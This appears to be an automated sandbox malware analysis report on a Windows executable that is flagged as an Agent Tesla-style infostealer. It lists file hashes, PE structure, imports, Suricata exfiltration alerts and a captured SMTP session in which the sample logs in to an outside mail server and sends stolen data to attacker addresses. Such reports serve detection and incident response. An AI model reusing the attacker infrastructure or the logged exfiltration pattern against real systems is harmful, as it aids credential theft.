Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | DarkTortilla, Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | AsyncRAT, DcRat | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
|
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06
Download File
Process: | C:\Users\user\Desktop\VYLigyTDuW.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 46 |
Entropy (8bit): | 1.0424600748477153 |
Encrypted: | false |
SSDEEP: | 3:/lbq:4 |
MD5: | 8CB7B7F28464C3FCBAE8A10C46204572 |
SHA1: | 767FE80969EC2E67F54CC1B6D383C76E7859E2DE |
SHA-256: | ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96 |
SHA-512: | 9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
File type: | |
Entropy (8bit): | 6.782767906080151 |
TrID: |
|
File name: | VYLigyTDuW.exe |
File size: | 1'956'616 bytes |
MD5: | 89471f2ae47d710f5b6db4afe8a48e77 |
SHA1: | 903d8a21673dcc19826fa56731dc2710f2d95755 |
SHA256: | 56fdd77d4097b1ce3500d7178788e35731ffe0be159bca0bd1efe4e0477affa3 |
SHA512: | 6f621de51e83544a0b1aa8c65b588f553049f32d8a441a65d9b7f1fdf637c7e96af593172aadf77f6260cef3e5de78924a1032964b9412ad7eec579e4c578852 |
SSDEEP: | 49152:ZbdYAm4zrbdYAm4zobdYAm4zvbdYAm4zdbdYAm4zZbdYAm4zpQBaYPxjFqFJ:Rdr3drCdrzdrddrRdruLPxBU |
TLSH: | 4F95AE43724C57ADCA630B31F63FC0A413259EBF96144B1B36CBFB2D19BA15B492A2C5 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G..g..................... ......d.............@........................................................................ |
Icon Hash: | 6ced8d96b2ace4b2 |
Entrypoint: | 0x5aff64 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | |
Time Stamp: | 0x6704A147 [Tue Oct 8 03:04:39 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | e0e5cba487d80ef75c8cfd3e40cc6131 |
Signature Valid: | false |
Signature Issuer: | CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE |
Signature Validation Error: | The digital signature of the object did not verify |
Error Number: | -2146869232 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | D26432F60E2A3BBEB3537B78CB826828 |
Thumbprint SHA-1: | 71AB79E1C8FF155838C37A5299AE215C52BF6D1D |
Thumbprint SHA-256: | BCB22974DD56BFE9A9197D05C2D4B646F5BDF23B8BA2ACB8FD9DB1557245A407 |
Serial: | 7AE2B5021371F092A904B6FA |
Instruction |
---|
jmp 00007F1F34C1BE88h |
add byte ptr [edx], ch |
sub al, byte ptr [edx-45F135B8h] |
xor eax, CC15F219h |
or esp, dword ptr [ecx+1B948C81h] |
lea ecx, dword ptr [edx-10h] |
fldcw word ptr [esp+ebp*2+2E7A03DAh] |
fdiv dword ptr [ecx+esi*8-4EBF9020h] |
and ebp, dword ptr [eax+6Ah] |
inc eax |
adc al, AFh |
inc ebx |
adc byte ptr [edx-341A3688h], al |
and byte ptr [bx+di], 00000046h |
xchg eax, esp |
dec ebx |
aam C6h |
std |
mov ebp, EA97B917h |
mov ch, 62h |
mov edx, dword ptr [ebx-7181DC68h] |
das |
sbb byte ptr [ecx], bh |
mov dword ptr [edx+4241EA4Ch], ebp |
call far fword ptr [esi-34h] |
outsd |
jmp far C389h : 7631CD4Ch |
dec eax |
std |
push esp |
cmp bh, byte ptr [esi+12h] |
mov word ptr [ecx], ds |
fidivr dword ptr [ecx-50152C0Ah] |
jnp 00007F1F34DCA5B9h |
add ebx, dword ptr [ebp-5A9A85DDh] |
retf 5FE7h |
pmaddwd mm5, qword ptr [ebx+edx*4-62h] |
mov esp, 4FABFBEAh |
inc ebp |
int 38h |
xor ebp, dword ptr [edx-3781D854h] |
int1 |
test byte ptr [esp+ecx], bl |
jmp far A0D5h : 18F20BB7h |
xor dh, byte ptr [eax-33h] |
ror dword ptr [ecx], FFFFFF9Dh |
mov esp, 1B387C29h |
test eax, 610C168Fh |
mov seg?, word ptr [ebp-6Eh] |
or eax, 33D56245h |
dec eax |
mov ch, 63h |
js 00007F1F34DCA62Fh |
cwde |
insd |
retf 9ECEh |
add esi, dword ptr [edx-729DEB77h] |
jnle 00007F1F34DCA634h |
and al, C8h |
fisubr dword ptr [ebp+00h] |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1c81d4 | 0x3c | .text |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1cd000 | 0x10b18 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1db000 | 0x2b08 | .rsrc |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1e4 | .text |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x1c79bc | 0x1c8000 | 9a0ea62ca8deb2d238ae1c4360694d67 | False | 0.6657040244654605 | data | 6.83339217870378 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.data | 0x1c9000 | 0x3d24 | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x1cd000 | 0x10b18 | 0x11000 | 124c6c1cd6819c7637ca7967308b1273 | False | 0.08262005974264706 | data | 3.7429251183206045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x1cd0e8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 34556 x 34556 px/m | 0.07952797823258015 | ||
RT_GROUP_ICON | 0x1dd910 | 0x14 | data | 1.15 | ||
RT_VERSION | 0x1dd924 | 0x1f4 | data | German | Germany | 0.5 |
DLL | Import |
---|---|
KERNEL32.DLL | GetProcAddress, VirtualAlloc, GetModuleHandleW |
MSVBVM60.DLL | __vbaVarSub, __vbaStrI2, _CIcos, _adj_fptan, __vbaVarMove, __vbaVarVargNofree, __vbaFreeVar, __vbaLineInputStr, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaNextEachVar, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaRefVarAry, __vbaBoolVarNull, _CIsin, __vbaErase, __vbaVargVarMove, __vbaVarZero, __vbaVarCmpGt, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, DllFunctionCall, __vbaVarOr, __vbaRedimPreserve, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, __vbaNew, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaUbound, __vbaVarCat, _CIlog, __vbaFileOpen, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaVarLateMemCallLd, __vbaVarCopy, _CIatan, __vbaStrMove, __vbaCastObj, __vbaAryCopy, __vbaStrVarCopy, __vbaForEachVar, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
German | Germany |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-10T15:17:55.647888+0100 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
2025-01-10T15:17:55.647888+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
2025-01-10T15:19:34.204660+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
2025-01-10T15:19:34.204660+0100 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.4 | 49735 | 162.254.34.31 | 587 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 15:17:51.969058990 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:51.969108105 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:51.969166994 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:52.014985085 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:52.015007019 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:52.496079922 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:52.496180058 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:52.500375032 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:52.500386953 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:52.500653028 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:52.554266930 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:52.560434103 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:52.607342958 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:52.678611040 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:52.678672075 CET | 443 | 49734 | 172.67.74.152 | 192.168.2.4 |
Jan 10, 2025 15:17:52.678734064 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:52.696069002 CET | 49734 | 443 | 192.168.2.4 | 172.67.74.152 |
Jan 10, 2025 15:17:53.954946995 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:53.959896088 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:53.960088968 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:54.640772104 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:54.641338110 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:54.646188021 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:54.805648088 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:54.812599897 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:54.817471981 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:54.975841999 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:54.982007027 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:54.986927032 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.149024963 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.149318933 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:55.154217958 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.315458059 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.316905022 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:55.321661949 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.483536959 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.483849049 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:55.488627911 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.647083998 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.647860050 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:55.647887945 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:55.647962093 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:55.647991896 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:17:55.652754068 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.652770042 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.652828932 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.652837992 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.935142994 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:17:55.979136944 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:19:34.024667025 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:19:34.029546976 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:19:34.204513073 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:19:34.204659939 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:19:34.204720020 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Jan 10, 2025 15:19:34.205461979 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 |
Jan 10, 2025 15:19:34.209542036 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 10, 2025 15:17:51.957453012 CET | 62625 | 53 | 192.168.2.4 | 1.1.1.1 |
Jan 10, 2025 15:17:51.963998079 CET | 53 | 62625 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 10, 2025 15:17:51.957453012 CET | 192.168.2.4 | 1.1.1.1 | 0x8987 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 10, 2025 15:17:51.963998079 CET | 1.1.1.1 | 192.168.2.4 | 0x8987 | No error (0) | 172.67.74.152 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 15:17:51.963998079 CET | 1.1.1.1 | 192.168.2.4 | 0x8987 | No error (0) | 104.26.12.205 | A (IP address) | IN (0x0001) | false | ||
Jan 10, 2025 15:17:51.963998079 CET | 1.1.1.1 | 192.168.2.4 | 0x8987 | No error (0) | 104.26.13.205 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49734 | 172.67.74.152 | 443 | 7360 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2025-01-10 14:17:52 UTC | 155 | OUT | |
2025-01-10 14:17:52 UTC | 424 | IN | |
2025-01-10 14:17:52 UTC | 12 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Jan 10, 2025 15:17:54.640772104 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 220 server1.educt.shop ESMTP Postfix |
Jan 10, 2025 15:17:54.641338110 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | EHLO 284992 |
Jan 10, 2025 15:17:54.805648088 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250-server1.educt.shop 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING |
Jan 10, 2025 15:17:54.812599897 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | AUTH login c2VuZHhzZW5zZXNAdmV0cnlzLnNob3A= |
Jan 10, 2025 15:17:54.975841999 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 334 UGFzc3dvcmQ6 |
Jan 10, 2025 15:17:55.149024963 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 235 2.7.0 Authentication successful |
Jan 10, 2025 15:17:55.149318933 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | MAIL FROM:<sendxsenses@vetrys.shop> |
Jan 10, 2025 15:17:55.315458059 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250 2.1.0 Ok |
Jan 10, 2025 15:17:55.316905022 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | RCPT TO:<senses@vetrys.shop> |
Jan 10, 2025 15:17:55.483536959 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250 2.1.5 Ok |
Jan 10, 2025 15:17:55.483849049 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | DATA |
Jan 10, 2025 15:17:55.647083998 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 354 End data with <CR><LF>.<CR><LF> |
Jan 10, 2025 15:17:55.647991896 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | . |
Jan 10, 2025 15:17:55.935142994 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 250 2.0.0 Ok: queued as 63C3E600E9 |
Jan 10, 2025 15:19:34.024667025 CET | 49735 | 587 | 192.168.2.4 | 162.254.34.31 | QUIT |
Jan 10, 2025 15:19:34.204513073 CET | 587 | 49735 | 162.254.34.31 | 192.168.2.4 | 221 2.0.0 Bye |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 09:17:47 |
Start date: | 10/01/2025 |
Path: | C:\Users\user\Desktop\VYLigyTDuW.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 1'956'616 bytes |
MD5 hash: | 89471F2AE47D710F5B6DB4AFE8A48E77 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 09:17:50 |
Start date: | 10/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x970000 |
File size: | 65'440 bytes |
MD5 hash: | 0D5DF43AF2916F47D00C1573797C1A13 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 21.4% |
Dynamic/Decrypted Code Coverage: | 9.3% |
Signature Coverage: | 6.2% |
Total number of Nodes: | 550 |
Total number of Limit Nodes: | 68 |
Graph
Function 022A2DA5 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 369nativethreadprocessCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022A2D84 Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 361nativeCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054AA9F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153nativememoryCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054B868 Relevance: 194.9, APIs: 108, Strings: 3, Instructions: 691librarymemoryloaderCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054D027 Relevance: 155.5, APIs: 103, Instructions: 974COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054F0C9 Relevance: 105.4, APIs: 59, Strings: 1, Instructions: 441memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054F786 Relevance: 100.2, APIs: 56, Strings: 1, Instructions: 453memoryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054DD50 Relevance: 39.2, APIs: 26, Instructions: 206COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C231 Relevance: 33.2, APIs: 22, Instructions: 178COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C7404 Relevance: 15.1, APIs: 10, Instructions: 114COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054B24F Relevance: 4.5, APIs: 3, Instructions: 44COMMON
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C54EB Relevance: 1.5, APIs: 1, Instructions: 39COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C732C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054ACFA Relevance: 1.3, Strings: 1, Instructions: 32COMMON
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054B055 Relevance: .0, Instructions: 42COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022A3376 Relevance: .0, Instructions: 28COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054AD6C Relevance: .0, Instructions: 7COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054AD80 Relevance: .0, Instructions: 6COMMON
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022A6CEC Relevance: .0, Instructions: 5COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022A707B Relevance: .0, Instructions: 4COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022A6C8B Relevance: .0, Instructions: 3COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022A7109 Relevance: .0, Instructions: 3COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 022A6F52 Relevance: .0, Instructions: 3COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C6ABD Relevance: 69.3, APIs: 46, Instructions: 301COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C2F10 Relevance: 37.6, APIs: 25, Instructions: 130COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C72B Relevance: 30.1, APIs: 20, Instructions: 105COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 005C5D8C Relevance: 25.6, APIs: 17, Instructions: 108COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054EEC1 Relevance: 21.1, APIs: 14, Instructions: 137COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054CEF9 Relevance: 19.6, APIs: 13, Instructions: 74COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C559 Relevance: 16.6, APIs: 11, Instructions: 80COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054ED02 Relevance: 15.1, APIs: 10, Instructions: 87COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C8B0 Relevance: 15.1, APIs: 10, Instructions: 82COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054F663 Relevance: 15.1, APIs: 10, Instructions: 71COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054CD59 Relevance: 12.0, APIs: 8, Instructions: 48COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054C9D2 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0054B3EB Relevance: 9.1, APIs: 6, Instructions: 66COMMON
APIs |
|
Memory Dump Source |
|
|
